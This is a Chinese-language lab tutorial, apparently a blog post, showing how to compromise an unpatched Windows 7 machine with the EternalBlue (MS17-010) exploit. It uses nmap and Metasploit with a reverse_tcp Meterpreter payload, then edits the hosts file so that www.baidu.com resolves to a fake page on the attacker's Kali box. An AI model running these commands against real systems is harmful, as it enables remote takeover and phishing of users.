利用永恒之蓝漏洞进行DNS劫持攻击

 1.永恒之蓝漏洞利用的是Windows操作系统中的SMB(Server Message Block)协议的一个安全漏洞,通过发送特制的网络数据包,攻击者可以在目标系统上执行任意代码,从而获取系统权限并控制目标计算机。

DNS劫持攻击是一种网络攻击方法,攻击者通过篡改DNS(Domain Name System)服务器的记录,将用户的域名请求导向恶意网站或者伪装成合法的网站,从而实施欺骗、窃取信息或者进行其他恶意行为。

下面演示的是通过永恒之蓝漏洞获得靶机权限,修改hosts文件的dns代理,从而实现dns劫持。

准备:

靶机:win7(没有打任何补丁),关闭防火墙

攻击机:kali

kali和win7之间能够相互ping通。

开始演示:

1.查看靶机正常状态。

2.回到攻击机(kali),查看这个index.html文件的代码,这是apache官网提供的访问页面,开启apache服务后,本地访问就是这个网页。还有一点就是,我们写的代码也得写在名为index.html这个文件才行。

server apache2 start

cd /var/www/html

3.对index.html这个文件进行备份:

cp index.html index1.html

 vim index.html

4.在index.html文件中写上我们网页的代码,这样一个假的网页就做好了,接下来就是让靶机在访问百度时跳转到我们做好的页面上。

保存退出。

5.先看一下本机的IP地址,然后开始IP嗅探,查看同一网段内存在的主机。

6.用nmap扫描开放的端口。

ip地址为kali的ip地址,扫描这个网段也是可以的。

nmap 192.168.159.136 -sS

nmap 192.168.159.136 --script-smb-vuln-ms17-010

7.打开metasploit.

msfconsole

search ms17-010

use 0

set payload  windows/x64/meterpreter/reverse_tcp

 设置攻击目标的ip地址:

set rhost 192.168.159.135

run

 

getuid

shell

echo 192.168.159.136 www.baidu.com >>C:\windows\System32\drivers\etc\hosts

 ipconfig /flushdns

 

9.回到靶机,查看hosts是否修改成功。

攻击成功。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值